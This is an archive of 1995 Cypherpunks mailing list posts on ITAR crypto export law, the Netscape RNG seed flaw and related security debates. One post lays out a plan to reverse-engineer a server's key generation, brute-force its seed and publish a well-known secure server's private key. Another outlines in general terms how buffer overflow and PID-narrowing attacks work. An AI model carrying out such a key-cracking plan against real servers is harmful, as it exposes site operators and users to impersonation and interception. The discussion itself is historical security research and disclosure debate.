: of an algorithm that has been widely printed in various books and in
: articles in mailing lists like ours.
 
The fact that the government does not dare to try to enforce the ITAR
against those who publish cryptographic software without a license (and
the fact that the Office of Defense Trade Controls has waived its jurisdiction
to require a license in one case for a book where it retained
jurisdiction for a CDrom with the same information) does not mean that
it is not a violation of the ITAR to publicly wear a T-shirt with
cryptographic software on it; although it does strongly suggest that
no one will be prosecuted for such violations.

And that is just as well, since the posting on an anonymous FTP server
of the C program that cracks the seed for the Netscape security routines
is also a technical violation of the ITAR, as even Mr. May will
perhaps concede.  The fact that warning the world of this security
breach is a violation of the ITAR simply shows how silly--and how
dangerous--is the ITAR's licensing scheme for the publication
of cryptographic software.

: (I agree that there are some unresolved issues with ostensibly
: machine-readable forms. The t-shirt is not machine-readable by any
: plausible interpretation of machine-readable.)

There is nothing in the ITAR that refers to ``machine-readable'' so
there is no need to interpret that term.  
 
- --
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 09:00:23 PDT
To: John Gilmore <cypherpunks@toad.com
Subject: Re: Netscape is doing well -- give 'em a break.
Message-ID: <ac86db1d3c02100464ca@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:52 AM 9/21/95, John Gilmore wrote:

>All progress is by steps.  Let's step on each others' shoulders, not
>on each others' toes.  Netscape is doing us a favor by pushing strong
>crypto.  We are doing them a favor by pointing out problems before
>they cause major losses to Netscape customers.  The result is higher
>security for everyone, and more respect for each other's efforts.  So
>kindly show them a little...

I agree strongly with John.

This whole Netscape thing is good for us, good for Netscape (in the long
run), and good for raising the awareness of the importance of strong
crypto.

It also underscores the need for "tiger teams" to validate software, much
as the Pentium debacle of last fall underscored the need for even more
detailed checking of designs.

It's clear now that 1000 ravenous Cypherpunks, or some fraction of them,
are eager to "crack" the next big product, and this will hopefully make for
better and stronger software.

--Tim May

Notice: With 1000 people on the Cypherpunks list, and many on other lists I
am on, nearly every article I write generates at least one question,
request for more information, dispute with my choice of words, etc. I have
been trying to respond to these, usually privately, but the burden has
become too much, and I no longer plan to respond to trivial or ephemeral
points. If you don't hear from me, this is why. Some requests for pointers
to information will still be handled, but I advise people to learn how to
use the archives and/or search tools.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 21 Sep 95 06:13:19 PDT
To: cypherpunks@toad.com>
Subject: Re: FROM A FRIEND . . .
In-Reply-To: <43qvn4$mm@calum.csclub.uwaterloo.ca>
Message-ID: <m0svlSw-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg writes:

: In article <43qrhf$gd5@tera.mcom.com>,
: Jeff Weinstein <jsw@neon.netscape.com> wrote:
: >  I think that the general opinion of engineers and management here at
: >Netscape is that it would be A Really Good Thing to have our US-only
: >128+ bit version of Netscape Navigator available for download by US
: >citizens and others who are not legally prohibited from using it.
: 
: Who _is_ legally prohibited from using it?  I think there are some countries
: where the very use of crypto is illegal (could someone please list them?),
: but who else?
: 
: There are some people that may be legally prohibited from _obtaining_ it
: from a US site (ITAR yadda), but even so, if JRFurriner downloads
: crypto from company C's site in the US, who's guilty of ITAR-violation?
: Company C for making it available, or JRF for initiating the action
: that caused the bits to be send out of the country?
: 
:    - Ian "my, I seem to be posting a lot tonight"

Probably both have violated the ITAR, but neither will be actually
prosecuted.  On the other hand, Company C will be threatened and
harassed until it stops making the software available.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s675570@aix2.uottawa.ca
Date: Thu, 21 Sep 95 06:19:13 PDT
To: Jeff Weinstein <jsw@neon.netscape.com>
Subject: Re: FROM A FRIEND . . .
In-Reply-To: <43r488$met@tera.mcom.com>
Message-ID: <Pine.3.89.9509210842.A64607-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On 21 Sep 1995, Jeff Weinstein wrote:

>   Poor choice of words on my part.  My understanding is that we can not
> export our US-only product, except to canada - for the use of canadian
> citizens.  I also believe that it is illegal for anyone except US citizens,
> permanent residents of the US (green card holders) and Canadian citizens
> to use it, even within the US.  I'm not a lawyer, and I've not read
> all of ITAR myself, so I could be totally wrong...
> 
> 	--Jeff

And from what the folks at the Export Controls division of the Department 
of External Affairs in Ottawa told me, Canadians can't export 
export-controlled American software, including pgp and other freeware, 
without a license. OTOH we can export non-US=origin software license-free
(well freeware for sure, anyway, I didn't get the whole thing quite right). 

Of course there are a few countries for which you would need a license,
and some UN embargoed countries to which you can't make any exports (both 
sets are dictatorships or warzones, so not much net access anyway and the 
crypto laws would make France's look cpunk).

They're also waiting to see what happens to Phil Z. to decide whether or not
ftp's are exports. All the same, if anyone wants an easy and economical
way to get around ITAR, have someone do your cypto software development 
just north of the border (Vancouver's just north of Seattle and close 
enough to Silicon Valley, with excellent net-access) or at least just
publish it here first. Phil could have saved himself an immense amount of 
trouble with a short car ride. You Americans on the list could too.

Wanna nag your bosses some more Jeff? You'd be doing everyone a favor and
get your wish.

You can get "A guide to Canada's export controls" from:

Foreign Affairs and international trade Canada. 
Export controls division
125 Sussex Drive, C-4
P.O. Box 481, Station A
Ottawa, Ontario
K1N 9K6
Fax: (613) 996-9933
Tel: (613) 996-2387

Remember to also ask for the "general software note"

For the West Coasters on the list there's also an address closer to home
(they have addresses in all the major Canadians cities, if anyone wants
visit them personally, send me a msg and I'll mail you nearest address)

International Trade Centre
Scotia Tower
900-650 West Georgia Street
P.O. Box 11610
Vancouver, British Columbia
V6B 5H8
Fax: (604) 666-8330
Tel: (604) 666-0434






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 21 Sep 95 06:28:44 PDT
To: cypherpunks@toad.com
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <34057.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  thad@hammerhead.com (Thaddeus J. Beier)  writes:

> At this point, in this country, a patent is secret until it is issued.

This will change in the US fairly soon. It is fallout of one of the
world-wide trade and tarriff treaties -- we have to make our
patent process be more in line with the rest of the world.

One of the big technical challenges that the PTO and PRC have is how
to release in-process patents securly. (PRC is the systems integrator
for the PTO's APS (advanced Patent System) that had all the text and images
of all patents since 1970 online.)

They have even talked about putting patents on the WWW, but actually doing
it is quite a way off in the future.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 09:18:02 PDT
To: cypherpunks@toad.com
Subject: Re: Entropy vs Random Bits
Message-ID: <ac86dcbd3d021004c67b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 PM 9/20/95, David Van Wie wrote:
>I've been watching the debate and discussion unfold on usable sources of
>random data from environments, user actions, etc.  I have a vocabulary
>question (and something of a bone to pick as a mathematician and physicist).

Well, I was trained as a physicist also, but am completely comfortable with
the Shannon definition of information-theoretic entropy. In fact, through
my readings about entropy in computations (cites below), I now view
traditional thermodynamic entropy as a special case of information theory!

>Usually, the term "entropy" is being used to characterize one of two
>different things: (i) random data, as in "300 bits of entropy," and (ii) the
>"randomness" of data (i.e. high degree of variance in a statistic drawn from
>it), as in "you can find a lot of entropy in the low order bits of a timed
>interval between keystrokes."  I suspect that there are other shades of
>meaning intended in other uses as well.
>
>This is odd.  The term entropy describes an aspect of thermodynamic
>equlibrium in physical systems.  Although sometimes used as a synonym for
>"random," that definition is vernacular, not technical.  In fact, there is
>no meaningful relationship between "entropy" and random data of the type
>described in the postings related to seed values.  In the presense of a
>perfectly suitable and precise mathematical term (i.e. random), why invent
>new terms?  Why use them to mean at least two different things?

Entropy has been used with an information theory context since the 1950s,
by Claude Shannon and others.

I disagree that there is "no meaningful relationship between "entropy" and
random data of the type described in the postings related to seed values."
The bits of entropy we are talking about are the "bits derived from a
physical process or a user action which are effectively from a random
process."

(Granted, the internal thoughts of a user swirling the mouse around are not
quite as "random" as, say, alpha decay, but for all intents and purposes no
"prediction" can be made of the mouse motions, at certain levels of detail,
and the bits dervived are in fact effectively random. We are not "living in
a state of sin," to paraphrase Von Neumann, in using these bits and
assuming them to be random.)

Good books on the incredibly fascinating aspects of information theory, and
expecially algorithmic information theory:

* Cover and Thomas, "Elements of Information Theory." A good textbook on
information theory, covering gambling (!), prediction, and the
Chaitin-Kolmogoroff outlook.

* Chaitin, Gregory, "Algorithmic Information Theory." A bit dense to read,
and Chaitin has written several more popular accounts for "Scientific
American" and similar places.

* Zurek, Wojciech, editor, "Complexity, Entropy, and the Physics of
Infromation." This collection of great articles shows the role of entropy
in infromation theory, and why the thermodynamic definition is essentially
a variant of the more fundamental information-theoretic definition.

Enjoy!

--Tim May


Notice: With 1000 people on the Cypherpunks list, and many on other lists I
am on, nearly every article I write generates at least one question,
request for more information, dispute with my choice of words, etc. I have
been trying to respond to these, usually privately, but the burden has
become too much, and I no longer plan to respond to trivial or ephemeral
points. If you don't hear from me, this is why. Some requests for pointers
to information will still be handled, but I advise people to learn how to
use the archives and/or search tools.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Sep 95 06:33:23 PDT
To: Randy Catoe <Randy@mci.net>
Subject: Re: USA Today on Fear of Credit Cards over Net
In-Reply-To: <01HVIQUUZ6HU8WX6TO@MAILSRV1.PCY.MCI.NET>
Message-ID: <199509211332.JAA01558@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Randy Catoe writes:
> I'm told that the revenue lost to fraud in the
> credit card industry is around .15 percent of the gross purchase value.

Thats a giant amount of money in dollars.

> I'm also told that the credit card companies actually face higher costs
> from disputes, i.e. when you call them up and busy out a person to 
> resolve a question on you bill. 

Crypto will also reduce that rate, IMHO.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 09:38:36 PDT
To: vznuri@netcom.com
Subject: Re: netscape bug
Message-ID: <9509211634.AA18472@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Vlad Nuri said (with some exerpting)

> 
> none of the articles mention that the cracker must have login access
> to the computer that the random numbers are generated on. is this true?
> does the code require knowledge of the PID etc. that can only be obtained
> by a login to the system that the netscape session is running on?

It's been noted on this list before that some programs give uid information
out...sendmail comes to mind...this GREATLY narrows the search for a pid.

> P.M. notes that anywhere there is a data-driven buffer overflow (which
> he suspects are all over netscape) he can get code to execute anything
> he wants. this reminds me of the
> Morris internet worm that ran exactly the same way. it used a
> bug in the finger demon that caused a string buffer overwrite
> (via strcpy, instead of strncpy) to execute customized code.
> 
> my question: I have not seen the specifics of how this works. does
> this require specialized knowledge of the native machine language on the 
> host machine? or is it just used to cause something like a core dump
> to get a command line or something like that?

It requires knowledge of how the stack is set up and of assembler for the
target.  Most people in computer science know at least one assembler and
could easily add enough of another to launch an attack like this.  I did
one once to attack one of my programs as an example for a class.  Please
don't overestimate the difficulty of this attack or underestimate the 
number of folks out there that are qualified to launch it.  It's just that
most of us would rather be writing constructive code:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 21 Sep 95 09:42:02 PDT
To: anonymous@freezone.remailer
Subject: Re: Fraud Fraut Froth
In-Reply-To: <199509211130.HAA20039@light.lightlink.com>
Message-ID: <199509211636.JAA12440@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Or is the banking industry whipping up hysteria among
> purchasers to curb fraud losses? Was the work of those
> graduate students funded by someone -- directly or indirectly?
> If so, by whom? A banking consortium? A high-tech company
> working on some patentable security scheme?
> 

	Do free t-shirts count as funding?

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 21 Sep 95 06:46:15 PDT
To: cypherpunks@toad.com>
Subject: Re: FROM A FRIEND . . .
In-Reply-To: <43r488$met@tera.mcom.com>
Message-ID: <m0svlyf-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:

:   Poor choice of words on my part.  My understanding is that we can not
: export our US-only product, except to canada - for the use of canadian
: citizens.  I also believe that it is illegal for anyone except US citizens,
: permanent residents of the US (green card holders) and Canadian citizens
: to use it, even within the US.  I'm not a lawyer, and I've not read
: all of ITAR myself, so I could be totally wrong...

There is nothing in U.S. law that prohibits anyone from using a
cryptographic product, much to the frustration of the NSA, FBI, etc.
That is why they try to forbid speaking about it by pretending that
communication of information is exporting something.  There is a law
that forbids exporting munitions without a license and that is the
basis for the ITAR regulations.

The funny thing is that a law forbidding the use of cryptography just
might be constitutional--though I, for one, am convinced that it would
not be--while forbidding communication of information about
cryptography without a license is a blatant violation of the First
Amendment of the United States constitution.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joe Tardo" <joe_tardo@genmagic.com>
Date: Thu, 21 Sep 95 10:23:32 PDT
To: vznuri@netcom.com>
Subject: Re: netscape bug
Message-ID: <n1400443880.87116@qm.genmagic.com>
MIME-Version: 1.0
Content-Type: text/plain


        Reply to:   RE>netscape bug

"Vladimir Z. Nuri" writes:

>I am willing to bet that the netscape bug would have been fixed quickly if it
>had been quietly brought to their attention, without the blaring media
>lights (I enjoy the media circus as much as the next guy, but on the
>other hand, doing some things quietly may actually advance the cypherpunk
>cause further than by making a noisy hullaballoo in cyberspace).

I can't speak for Netscape in particular, but from bitter personal experience 
(in a previous life) I would  be more willing to bet that bringing such a flaw

to management's attention would raise the priority a bit to perhaps just below

whatever their equivalent of the 'cut line' is.  The rationale: "we are so 
resource limited;  can't just keep it under wraps and fix it in the next
release?" 
just rings in my ears.

I can really empathize with what the developers at Netscape must be going
through, but the 'social good' of raising security flaws to the level of the 
front page of the NYT is hard to deny.  Rather than saying "security through
obscurity is bad" you can point to a precedent of the consequences of being 
found out. 

--Joe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Thu, 21 Sep 95 07:01:47 PDT
To: jsw@neon.netscape.com>
Subject: Canada & ITAR
In-Reply-To: <Pine.3.89.9509210842.A64607-0100000@aix2.uottawa.ca>
Message-ID: <9509211000.ZM22513@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


[plug plug plug]

If you're impatient, much of the relevant text of the the "Canada's Export
Controls" booklet is available at
http://www.io.org/~samwise/crypto/

frodo =)

--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Thu, 21 Sep 95 07:18:16 PDT
To: cypherpunks@toad.com
Subject: Re: USA Today on Fear of Credit Cards over Net
Message-ID: <0u8RBD2w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

> 
> Re: The risk of credit cards.
> 
> I suppose that indeed there are large risks elsewhere in the credit
> card system. However, I think that the credit card system itself is
> stupid and insecure and ought to be scrapped -- sending around account
> numbers as magic keys to get payment is a stupid move. Its not
> suprising how large credit card fraud is.

Hence the fast growing popularity of those cash cards. 


--
                        WebCasters(tm)
James C. Grubs                         jgrubs@left.webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 10:04:39 PDT
To: cypherpunks@toad.com
Subject: Persistent Services Needed
Message-ID: <ac86e99240021004ca42@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



One of the problems we're facing with "Cypherpunks" services is that they
are catch-as-catch-can, or, bluntly, "flaky." Archive sites stop being
archives, remailers vanish overnight (*), and other experiments pop up and
then vanish with regularity.

(My favorite example, and one which always makes me smile, is the example
of a remailer in Europe a couple of years ago which became inoperative with
the message: "The foo remailer will stop operating tonight because I have
to take my laptop with me for the summer to Portugal.")

I'm not criticizing these folks. Rather, I'm just saying something pretty
obvious, that _persistence_ is important.

This probably means commercialization, or formalized business
relationships. With such persistent business set-ups, "the show must go
on."

Another reason for digital money.

--Tim May


Notice: With 1000 people on the Cypherpunks list, and many on other lists I
am on, nearly every article I write generates at least one question,
request for more information, dispute with my choice of words, etc. I have
been trying to respond to these, usually privately, but the burden has
become too much, and I no longer plan to respond to trivial or ephemeral
points. If you don't hear from me, this is why. Some requests for pointers
to information will still be handled, but I advise people to learn how to
use the archives and/or search tools.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 21 Sep 95 10:28:51 PDT
To: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Subject: Re: Euro-Clipper
In-Reply-To: <199509210102.SAA15389@cory.EECS.Berkeley.EDU>
Message-ID: <199509211728.KAA19754@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| I don't think I've seen this here (but it was on a bunch of security
| newsgoups...)
| 
|    - Ian

It's time for a European wing of the cypherpunks list.
Europeans - unite!

:-(

And they even have the indecency to immediately propose
to outlaw 'strong encryption for the people' - no grace
period there.


/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 10:17:24 PDT
To: cypherpunks@toad.com
Subject: Re: FROM A FRIEND . . . (the joys of boating)
Message-ID: <ac86ebe34202100455ae@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:00 PM 9/21/95, Landon Dyer wrote:

>  here's a possible bullshit wrinkle.  i'm not a lawyer, but one of my
>bosses was, once.
>
>  said boss owned a boat that was of canadian registry.  he was a
>canadian citizen with a green card.  he *claimed* that, even when
>docked in the SF bay area, his boat was technically considered
>canadian territory, due to some maritime law malarky.  US authorities
>theoretically had to go through various hoops to legally board his
>vessel.
>
>  i wouldn't try to halt a SWAT team, or even the local fuzz, with
>this tidbit of legal gaga.  but doing crypto development on such a
>vessel might hold up in court for something as squishy as ITAR.

I'm skeptical of this, as boating friends of mine tell me they are much
more easily boarded by the various water.cops who check for compliance with
navigation laws, with drug laws, with Customs laws, etc.

Within the 3-mile limits, or further out (?), broad discretion is given to
the water.cops who tell you to "Prepare to be boarded."

That a ship or boat is of Panamanian, Liberian, or even Candian registry
does not seem to have any effect on enforcement of drug-smuggling,
gun-running, waste-dumping, or reckless-manouvering laws.

I've already expressed my views on the hype surrounding the "This T-Shirt
Has Been Declared to be a Munition" hoopla, so I won't draw the obvious
inference about whether someone wearing an RSA-in-Perl t-shirt while
scrubbing their decks will be shot on sight. (Was Randy Weaver's wife
wearing an illegal t-shirt? Hmmmhhh, many conspiracy angles here!)

--Tim May

Notice: With 1000 people on the Cypherpunks list, and many on other lists I
am on, nearly every article I write generates at least one question,
request for more information, dispute with my choice of words, etc. I have
been trying to respond to these, usually privately, but the burden has
become too much, and I no longer plan to respond to trivial or ephemeral
points. If you don't hear from me, this is why. Some requests for pointers
to information will still be handled, but I advise people to learn how to
use the archives and/or search tools.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 21 Sep 95 07:31:48 PDT
To: jsw@netscape.com
Subject: PRNG state (and conditioning) (was Re: netscape's response)
In-Reply-To: <199509202031.NAA06951@comsec.com>
Message-ID: <9509211428.AA21108@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


If you are looking for PRNG conditioning code, feel free to snarf code from

	http://www.clark.net/pub/cme/html/ranno.html

I'm assuming your new PRNG has enough state (more than 64 bits) that the
128-bit key (or later, larger keys) is worth its bits.

I'm assuming you solve the problem of finding enough entropy bits for
seeding the PRNG and considering how to keep as much of that entropy as
possible in your PRNG seed (rather than, for a silly example, distilling it
to an unsigned int for driving rand() ).

For example, the state in ranG (from the giveaway code) or in ranM may not
by itself lead to a secure PRNG, but when it drives a one-way function
(e.g., ranH, ranD, ranN) the state is still serving a purpose.  [ranG
keeps 186 bytes of state while ranM keeps 32KB of state.]

 - Carl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 10:36:16 PDT
To: gnu@toad.com
Subject: Re: netscape's response (source code review)
Message-ID: <9509211732.AA18490@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> It is becoming gradually clearer in cryptanalysis that you can't test
> security of pieces in isolation.  Their interaction with the
> surrounding code and protocols is key to their security.  Ross

I don't think this is a new realization, attacks on crpyto systems have
always considered the whole system.

   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 21 Sep 95 10:35:26 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: NSA and Netscape Crack
In-Reply-To: <43qrpq$gd5@tera.mcom.com>
Message-ID: <199509211735.KAA19988@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| Believe it or not we don't like being trashed for
| being stupid all over the net, print media, and TV.  As far as I know
| the NSA have not given us any advice about how to make our system
| stronger.  I've heard rumors that they were quite upset when they
| learned that SSLs 40-bit RC4 was actually 40-bit secret and 88-bit salt.

It is dangerous that the general reaction is that of
'them being stupid', since that will prevent others
from stepping forward and reveal their own 'holes'.

I decree that 'all holes look stupid once located'.

But 'any non-trivially large program is bound to have
holes' => 'all programmers are stupid' (except me,
because I found the hole?)

Jeff, your and Netscape prompt response to this is
what counts - holes will always be uncovered, it's the
time before they are patched that really matters.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 21 Sep 95 11:30:56 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Persistent Services Needed
In-Reply-To: <ac86e99240021004ca42@[205.199.118.202]>
Message-ID: <199509211825.LAA23576@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	c2.org has been around for more than a year. The recent
publicity we've been getting should hopefully mean that we'll actually
start making a profit and be around for quite some time longer.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Thu, 21 Sep 95 08:27:41 PDT
To: gnu@toad.com (John Gilmore)
Subject: Re: Export via FTP: who's to blame?  Ask a court!
In-Reply-To: <9509210737.AA10902@toad.com>
Message-ID: <m0svnX7-0009z2C@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


...
> This is a question that has never been answered by a court.
> 
> Personally I think that the Congress can't constitutionally set up a
> scheme that restricts US citizens from communicating with each other
...

> If some hardy soul wants to set up a nice clean situation, like Phil
> Karn did for the paper-vs-magnetic-media distinction, I'm sure we can
> find some more pro-bono (zero cost) lawyers who'll take the case for
> the fun and notoriety.  You don't have to break the law to get into
> court; Phil didn't, for example.  You make a situation where the law
> restricts you, then sue to have the restriction declared invalid.  And
> if you have ever been in court, it's a lot more fun being the
> Plaintiff than being the Defendant.
> 
> Doing this will take significant time on your part.  Even if the
> lawyers do 95% of the work, you have to talk with them, review what
> they write, explain the details in gory detail, and believe in what
> they're doing for you.  And sometimes do things in a way that they are
> sure is right, even though you yourself aren't sure.  And stick with
> the case even though it would drag on for years through several
> courts.  So it's not something to do lightly.  But it's worth it.  And
> it's a lot safer and easier to enforce your civil rights now, than to
> try to live through the civil war that would follow the slide into
> authoritarian government.
> 
> I'd do this case myself, except that I think we should have few single
> points of failure.  If we spread the work around, it's more likely to
> happen.  And your civil rights are safer, because you yourself have
> learned how to defend them.
> 
> 	John

I recently moved to the DC area (N VA) and might be amenable to a relatively
harmless scenario like this.  (Not that I have much time, but I'm flexible.)

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 21 Sep 95 11:37:06 PDT
To: cypherpunks@toad.com
Subject: The Next Hack
Message-ID: <199509211832.LAA24086@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Now that we've seen that Netscape is doing a good job towards
trying to fix the hole that Ian and David have uncovered, it's time to
start looking at new things.

	Given the recent post to the www-security list that was
forwarded here, it seems like just replacing the server may not work
for all the secure servers out there-- keys may have to be replaced as
well. Let's find out.

Proposal for action:

1) Reverse-engineer a server to see if the keygen phase uses
a weak RNG seed. -- if so, determine the exact algorithim.

2) Organize a net-wide search over the space of the RNG seed to 
crack the private key of some well known secure server.

3) Release the private key to the net.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank A Stevenson <frank@funcom.no>
Date: Thu, 21 Sep 95 02:34:47 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
In-Reply-To: <9509201835.ZM154@tofuhut>
Message-ID: <Pine.SGI.3.91.950921112257.28289C@odin>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 20 Sep 1995, Jeff Weinstein wrote:

> NOTE: my first attempt to send this bounced at toad.com
> 
> On Sep 20,  5:16pm, David_A Wagner wrote:
> > Subject: Re: netscape's response
> > In article <9509200139.ZM206@tofuhut> you write:
> > > On Sep 20, 12:29am, Christian Wettergren wrote:
> > > > One wild idea that I just got was to have servers and clients exchange
> > > > random numbers (not seeds of course), in a kind of chaining way. Since
> > > > most viewers connect to a number of servers, and all servers are
> > > > connected to by many clients, they would mix "randomness sources" with
> > > > each other, making it impossible to observe the local environment
> > > > only. And the random values would of course be encrypted under the
